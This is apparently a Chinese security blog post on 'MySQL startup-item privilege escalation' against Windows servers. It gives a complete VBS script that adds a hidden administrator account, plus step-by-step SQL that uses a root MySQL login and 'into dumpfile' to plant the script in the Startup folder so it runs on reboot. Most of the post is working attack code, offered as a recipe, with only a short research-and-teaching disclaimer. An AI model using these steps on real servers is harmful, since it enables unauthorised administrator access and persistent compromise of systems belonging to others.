2022年1月6日01:47:27评论57 views字数 1103阅读3分40秒阅读模式

0x00 原理

重启服务器会自动调用导入到“ C:\Documents and Settings\All Users\「开始」菜单\程序\启动”下的VBS脚本，并执行其中的用户添加及提权命令。

0x01 利用条件

两种情况下均可用启动项提权
1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写
直接将 VBS 提权脚本上传到该目录下

2、以root账号登陆MySQL

0x02 提权关键

启动目录下的vbs脚本

0x03 提权步骤

一、上传VBS提权脚本到启动目录

VBS 提权脚本代码如下：

setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”quan”)
od.SetPassword “123456”
od.SetInfo
Set of=GetObject(os&“/quan”,user)
oe.add os&“/quan”

二、将数据库表中内容导入到启动目录

1、登录mysql
2、在test数据库下新建表
create table secist(cmd text);

3、插入vbs脚本

1
2
3

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);
insert into secist values(“a=wshshell.run(“”cmd.exe /c net user quan 123456 /add“”,0)”);
insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators quan /add“”,0)”);

4、导出vbs脚本到启动选项

1	select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\quan.vbs”;

5、利用其他手段使服务器重启后就提权成功了

0x04 参考

https://www.cnblogs.com/wh4am1/p/6613759.html
《网络攻防实战研究——漏洞利用与提权》5.7.2

https://www.cnblogs.com/0nc3/p/12071340.html

FROM :b0urne.top | Author:b0urne

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Mysql启动项提权

0x00 原理

0x01 利用条件

0x02 提权关键

0x03 提权步骤

一、上传VBS提权脚本到启动目录

二、将数据库表中内容导入到启动目录

0x04 参考

综述合辑 | 《网络空间安全科学学报》综述论文（上）

通达OA 任意用户登录漏洞

Weblogic IIOP 反序列化漏洞学习笔记(CVE-2020-2551)

Python 定制QQ机器人

RocketMQ 5.1.1写计划任务RCE

Nacos Raft Hessian反序列化漏洞分析

Tabby学习笔记 & Java反序列化gadget分析

Apache Jena 代码执行漏洞(CVE-2023-22665)

Apache Archiva 任意目录删除(CVE-2022-40309) 和任意文件读取(CVE-2022-40308)

用CodeQL分析漏洞_CVE-2022-42889

发表评论

在线咨询

微信